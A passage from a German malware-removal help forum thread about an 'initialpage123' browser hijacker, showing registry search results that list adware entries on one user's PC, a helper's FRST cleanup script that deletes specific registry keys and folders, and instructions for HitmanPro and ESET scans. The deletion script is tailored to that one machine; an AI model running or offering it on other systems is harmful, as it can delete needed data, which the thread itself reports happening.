[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4CD8824-4049-11E7-9F11-64006A5CFC23}\InProcServer32]
""="C:\Users\Default\AppData\Roaming\Minerent\Wuteghtplejipy.dll"


===================== Suchergebnis f黵 "Arucerther" ==========

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\Arucerther\phehigh.exe"="0x5341435001000000000000000700000028000000B88F0A002CBC020003000000000000000000030600210000975FD891C99ECE0100000080000000000500000010000000000000000000000000000000000000000200000028000000000000000000000000000000000000000000000000000000CB000000000000002C0000002C000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\Arucerther_\phehigh.exe"="0x5341435001000000000000000700000028000000B88F0A002CBC020003000000000000000000030600210000975FD891C99ECE0100000080000000000200000028000000000000000000000000000000000000000000000000000000AB080000000000000100000001000000"


===================== Suchergebnis f黵 "ttwifi" ==========

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\ttwifi\unins000.exe"="0x534143500100000000000000070000002800000036130E000000000003000000000000000000010600010000975FD891C99ECE01000000000000000002000000280000000000000000000000000000000000000000000000000000002F0D0000000000000100000001000000"


===================== Suchergebnis f黵 "devnull" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\devnull\"=""

[HKEY_USERS\.DEFAULT\Software\Caphyon\Advanced Updater\{5CD51A71-6B12-48AA-A8C4-525C1D32DC13}]
"C:\Program Files (x86)\devnull\NetAdapterUpdate\updater.exe"="0"

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers]
"C:\Program Files (x86)\devnull\NetAdapterUpdate\NetAdapterUpdate.exe"="~ RUNASADMIN"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\AppData\Roaming\devnull\NetAdapterUpdate 2.3.5\install\22B566E\NetAdapterUpdate_setup.msi"="0x534143500100000000000000070000002800000000FE00002CDB010001000000000000000000010500100000B395E7CF049FCE0100000000000000000200000028000000000000000000000000000000000000000000000000000000F53A0000000000000100000001000000"


===================== Suchergebnis f黵 "Grerdaentlerveck" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{234628B4-4048-11E7-9F2C-64006A5CFC23}\InProcServer32]
""="C:\Users\Nick Schuster\AppData\Roaming\Grerdaentlerveck\Thuvale.dll"


===================== Suchergebnis f黵 "Prfasaretaly" ==========

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\Prfasaretaly\dereph.exe"="0x5341435001000000000000000700000028000000708B0A002CBC020003000000000000000000030600210000975FD891C99ECE0100000080000000000200000028000000000000000000000000000000000000000000000000000000B3040000000000000100000001000000"


===================== Suchergebnis f黵 "pccleanplus" ==========

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\pccleanplus\uninstaller.exe"="0x534143500100000000000000070000002800000000BC060000000000030000000000000000000306F5220000B395E7CF049FCE0100000000000000000200000028000000000000000000000000000000000000000000000000000000983A0000000000000100000001000000"


===================== Suchergebnis f黵 "Babylon" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{2EECD738-5844-4A99-B4B6-146BF802613B}]
"DllName"="BabylonToolbar.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{97F2FF5B-260C-4CCF-834A-2DDA4E29E39E}]
"DllName"="BabylonToolbar.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Compatibility\{98889811-442D-49DD-99D7-DC866BE87DBC}]
"DllName"="BabylonToolbarTlbr.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extension Compatibility\{2EECD738-5844-4A99-B4B6-146BF802613B}]
"DllName"="BabylonToolbar.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extension Compatibility\{97F2FF5B-260C-4CCF-834A-2DDA4E29E39E}]
"DllName"="BabylonToolbar.dll"

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Extension Compatibility\{98889811-442D-49DD-99D7-DC866BE87DBC}]
"DllName"="BabylonToolbarTlbr.dll"


===================== Suchergebnis f黵 "SNARE" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-3847841184-804715454-2304624315-1001\Components\CD943DD1DFFCDBC40840F45E9091DD07]
"471315C2D818E9D48BF8E38227ABAC02"="C:\Users\Nick Schuster\Documents\VirtualDJ\Sampler\Instruments\Kick Snare.vdjsample"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Windows\Temp\winsap_update\WinSnare.msi"="0x534143500100000000000000070000002800000000EA0000FD42010001000000000000000000010500100000975FD891C99ECE01000000000000000002000000280000000000000000000000000000000000000000000000000000006F460000000000000500000005000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Windows\Temp\hp9A4F.tmp\WinSnare.msi"="0x534143500100000000000000070000002800000000FE00002CDB010001000000000000000000010500100000B395E7CF049FCE01000000000000000002000000280000000000000000000000000000000000000000000000000000009B2F0000000000000100000001000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Windows\Temp\winsap_update\Snarer.msi"="0x534143500100000000000000070000002800000000EA0000FD42010001000000000000000000010500100000975FD891C99ECE01000000000000000002000000280000000000000000000000000000000000000000000000000000009F870000000000001000000010000000"


===================== Suchergebnis f黵 "SNARER" ==========

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Windows\Temp\winsap_update\Snarer.msi"="0x534143500100000000000000070000002800000000EA0000FD42010001000000000000000000010500100000975FD891C99ECE01000000000000000002000000280000000000000000000000000000000000000000000000000000009F870000000000001000000010000000"


===================== Suchergebnis f黵 "Yeshat" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Yeshat]

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Yeshat]
"path"="C:\Program Files (x86)\Yeshat\"

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Yeshat]
"publicdirectroy_du"="C:\Program Files (x86)\Yeshat\Reports\Dump"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\3e84c307_0]
""="{2}.\\?\hdaudio#func_01&ven_10ec&dev_0269&subsys_1b0a2256&rev_1002#{6994ad04-93ef-11d0-a3cc-00a0c9223196}\eheadphonetopo/00010001
\Device\HarddiskVolume3\Program Files (x86)\Yeshat\Application\chrome.exe%b{00000000-0000-0000-0000-000000000000}"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Program Files (x86)\Yeshat\Application\chrome.exe"="0x5341435001000000000000000700000028000000585F0E0077AC0E0001000000000000000000030600210000975FD891C99ECE010000000100000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Yeshat]


===================== Suchergebnis f黵 "Kyubey" ==========

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\Windows\Temp\nsi8E5B.tmp\Kyubey.exe"="0x534143500100000000000000070000002800000000B603000000000001000000000000000000030671220000975FD891C99ECE0100000000000000000200000028000000000000000000000000000000000000000000000000000000EF210000000000000100000001000000"


===================== Suchergebnis f黵 "BikaQRss" ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files (x86)\BikaQRss\"=""


===================== Suchergebnis f黵 "WinSAPSvc" ==========

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\programdata\winsapsvc\winsap_update\amule.msi"="0x534143500100000000000000070000002800000000EA0000FD42010001000000000000000000010500100000975FD891C99ECE0100000000000000000200000028000000000000000000000000000000000000000000000000000000640C0000000000000100000001000000"

[HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store]
"C:\programdata\winsapsvc\winsap_update\uvcSetup.msi"="0x534143500100000000000000070000002800000000EA0000FD42010001000000000000000000010500100000975FD891C99ECE010000000000000000020000002800000000000000000000000000000000000000000000000000000080310000000000000100000001000000"

====== Ende von Suche ======
         
es gibt ein problem:
das programm FRST hatt einen ordner namens ,,982652986570268672创 gel鰏cht in dem wichtige dateien enthalten waren..... wie kann ich den wiederherstellen?

Alt 07.06.2017, 14:01   #13
M-K-D-B
/// TB-Ausbilder
 
wie kann ich den  ,,initialpage123创 virus beseitigen? - Standard

wie kann ich den ,,initialpage123创 virus beseitigen?



Servus,



Zitat:
das programm FRST hatt einen ordner namens ,,982652986570268672创 gel鰏cht in dem wichtige dateien enthalten waren..... wie kann ich den wiederherstellen?
Ok, ich ber點ksichtige das im n鋍hsten Schritt. Dann k鰊nen wir den Ordner sp鋞er wiederherstellen.






Wir entfernen noch ein bisschen was und kontrollieren nochmal alles.



Hinweis: Der Suchlauf mit ESET kann l鋘ger dauern.





Schritt 1
  • Kopiere den Inhalt der folgenden Code-Box:
    Code:
    ATTFilter
    Start::
    CloseProcesses:
    C:\Users\Nick Schuster\AppData\Local\Pleperiedsdeied
    C:\autoexec.bat
    MSCONFIG\Services: SysLinkMapper => 2
    DeleteKey: HKEY_USERS\.DEFAULT\Software\Classes\Applications\interstatnogui.exe
    DeleteKey: HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\NetCtl
    DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\DiagnosedApplications\Plumbytes.exe
    DeleteKey: HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\5ritFihZeyda
    DeleteKey: HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Wow6432Node\Speedownloader0099
    DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RADAR\HeapLeakDetection\DiagnosedApplications\SpyHunter4.exe
    DeleteKey: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\iSafeKrnlBoot
    DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5EBD559E-A5BA-11E6-B9FD-64006A5CFC23}
    DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{9C829CE8-039A-11E7-8F7F-64006A5CFC23}
    DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{234628B4-4048-11E7-9F2C-64006A5CFC23}
    DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A4CD8824-4049-11E7-9F11-64006A5CFC23}
    DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Everness
    DeleteKey: HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Everness
    DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Applemy
    DeleteKey: HKEY_USERS\.DEFAULT\Software\Caphyon
    DeleteKey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Yeshat
    DeleteKey: HKEY_USERS\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Yeshat
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Svchost|AppleSvcs
    DeleteValue: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved|KuaiZip Shell Extension
    Folder: C:\Users\Nick Schuster\AppData\Local\Atajerge
    Folder: C:\Users\Nick Schuster\AppData\Local\Profiles
    Folder: C:\Users\Nick Schuster\Searches
    FindFolder: 982652986578268672
    EmptyTemp:
    End::
             
  • Starte nun FRST und klicke den Entfernen Button.
  • Das Tool f黨rt die gew黱schten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich die FRST/FRST64.exe befindet.
  • Gegebenenfalls muss dein Rechner daf黵 neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner n鋍hsten Antwort.





Schritt 2
Downloade dir die passende Version von HitmanPro auf deinen Desktop: HitmanPro - 32 Bit | HitmanPro - 64 Bit.
  • Starte die HitmanPro.exe
  • Klicke auf
  • Entferne den Haken bei
  • Klicke auf
    und
  • Akzeptiere die Lizenzbedingungen und klicke auf
  • Klicke auf

    und auf
  • Wenn der Scan beendet wurde, nichts l鰏chen lassen etc. sondern w鋒le unten links auf der Button-Leiste
    und speichere die Logdatei auf Deinem Desktop.
  • Schlie遝 HitmanPro und poste mir das Log.

 







Schritt 3

ESET Online Scanner

  • Hier findest du eine bebilderte Anleitung zu ESET Online Scanner
  • Lade und starte Eset Online Scanner
  • Setze einen Haken bei Ja, ich bin mit den Nutzungsbedingungen einverstanden und klicke auf Starten.
  • Aktiviere die "Erkennung von eventuell unerw黱schten Anwendungen" und w鋒le folgende Einstellungen.
  • Klicke auf Starten.
  • Die Signaturen werden heruntergeladen, der Scan beginnt automatisch.
  • Klicke am Ende des Suchlaufs auf Fertig stellen.
  • Schlie遝 das Fenster von ESET.
  • Explorer 鰂fnen.
  • C:\Programme\Eset\EsetOnlineScanner\log.txt (bei 64 Bit auch C:\Programme (x86)\Eset\EsetOnlineScanner\log.txt) suchen und mit Deinem Editor 鰂fnen (bebildert).
  • Logfile hier posten.
  • Deinstallation: Systemsteuerung => Software / Programme deinstallieren => Eset Online Scanner V3 entfernen.
  • Manuell folgenden Ordner l鰏chen und Papierkorb leeren => C:\Programme\Eset








Schritt 4
  • Starte die FRST.exe erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und dr點ke auf Untersuchen.
  • FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner n鋍hsten Antwort.







Gibt es jetzt noch Probleme mit dem PC oder mit deinen Internet Browsern? Wenn ja, welche?







Bitte poste mit deiner n鋍hsten Antwort
  • die Logdatei des FRST-Fix,
  • die Logdatei von HitmanPro,
  • die Logdatei von ESET,
  • die beiden neuen Logdateien von FRST,
  • die Beantwortung der gestellten Fragen.
__________________
Gru
M-K-D-B


==========================================================
offline vom 22.12.2018 bis 01.01.2019
==========================================================

Das Trojaner-Board unterst黷zen

Alt 07.06.2017, 18:45   #14
NexsReloaded
 
wie kann ich den  ,,initialpage123创 virus beseitigen? - Standard

wie kann ich den ,,initialpage123创 virus beseitigen?



Zitat:
Kopiere den Inhalt der folgenden Code-Box:
was soll ich mit dem text darin machen nachdem ich ihn kopiert hab?

Alt 08.06.2017, 13:46   #15
M-K-D-B
/// TB-Ausbilder
 
wie kann ich den  ,,initialpage123创 virus beseitigen? - Standard

wie kann ich den ,,initialpage123创 virus beseitigen?



Zitat:
Zitat von NexsReloaded Beitrag anzeigen
was soll ich mit dem text darin machen nachdem ich ihn kopiert hab?
Steht doch in der Anleitung, die unter der Code-Box steht, wie es weiter geht...
__________________
Gru
M-K-D-B


==========================================================
offline vom 22.12.2018 bis 01.01.2019
==========================================================

Das Trojaner-Board unterst黷zen

Antwort

Themen zu wie kann ich den ,,initialpage123创 virus beseitigen?
.dll, beseitigen, betriebssystem, browser, cmd, eingefangen, einstellungen, explorer, firefox, frage, gen, installieren, interne, internet, internet explorer, loswerden, programme, proxy, seite, starte, starten, virus, virus beseitigen, windows, 鰂fnet



膆nliche Themen: wie kann ich den ,,initialpage123创 virus beseitigen?


  1. Wie kann ich Smartnewtab beseitigen
    Alles rund um Windows - 02.03.2016 (1)
  2. Mit ihavenet.com Virus infiziert, kann es nicht beseitigen.
    Log-Analyse und Auswertung - 01.09.2013 (26)
  3. Welcome to nginx Virus beseitigen
    Plagegeister aller Art und deren Bek鋗pfung - 14.06.2013 (22)
  4. Wie Ihavenet-Virus beseitigen?
    Log-Analyse und Auswertung - 15.10.2012 (42)
  5. 50 euro virus beseitigen
    Log-Analyse und Auswertung - 22.03.2012 (9)
  6. TR/Crypt.XPACK.Gen2, antivir kann ihn nicht beseitigen...
    Log-Analyse und Auswertung - 24.09.2011 (2)
  7. ClamXav meldet Desinfektion, kann sie aber nicht beseitigen
    Alles rund um Mac OSX & Linux - 02.03.2011 (9)
  8. AVG Anti Virus free meldet Virus PSW.Generic7.BWMP, Virus l溥t sich nicht beseitigen
    Plagegeister aller Art und deren Bek鋗pfung - 30.10.2010 (21)
  9. Avira findet TR Vilsel.aejm, kann ihn aber nicht beseitigen
    Plagegeister aller Art und deren Bek鋗pfung - 08.10.2010 (36)
  10. Trojaner eingefangen, Trojan.win32.buzus.dajg, Kaspersky kann es nicht beseitigen
    Log-Analyse und Auswertung - 03.10.2010 (1)
  11. Virus auf dem pc beseitigen
    Plagegeister aller Art und deren Bek鋗pfung - 28.03.2009 (1)
  12. HDplugin Virus,wie beseitigen?
    Plagegeister aller Art und deren Bek鋗pfung - 12.03.2009 (63)
  13. Wie kann folgendes beseitigen? (IE Fenster 鰂fnen sich automatisch)
    Plagegeister aller Art und deren Bek鋗pfung - 18.11.2008 (0)
  14. Virus W32/Mabezat-B beseitigen?
    Plagegeister aller Art und deren Bek鋗pfung - 28.08.2008 (10)
  15. Wie kann ich die Plagegeister beseitigen!
    Plagegeister aller Art und deren Bek鋗pfung - 07.11.2005 (3)
  16. Hilfe!!!! wer kann mir helfen, den Trojaner Smidfraud.c zu beseitigen???
    Plagegeister aller Art und deren Bek鋗pfung - 21.06.2005 (2)
  17. kann esepor.aa nicht beseitigen
    Plagegeister aller Art und deren Bek鋗pfung - 06.11.2004 (3)

Zum Thema wie kann ich den ,,initialpage123创 virus beseitigen? - ich habe mir anscheinend den ,,initialpage123创 virus eingefangen und meine frage ist wie ich den jetzt wieder loswerden kann? Infos: - betriebssystem: windows 8.1 - ich kann keine programme mehr - wie kann ich den ,,initialpage123创 virus beseitigen?...
Archiv
Du betrachtest: wie kann ich den ,,initialpage123创 virus beseitigen? auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.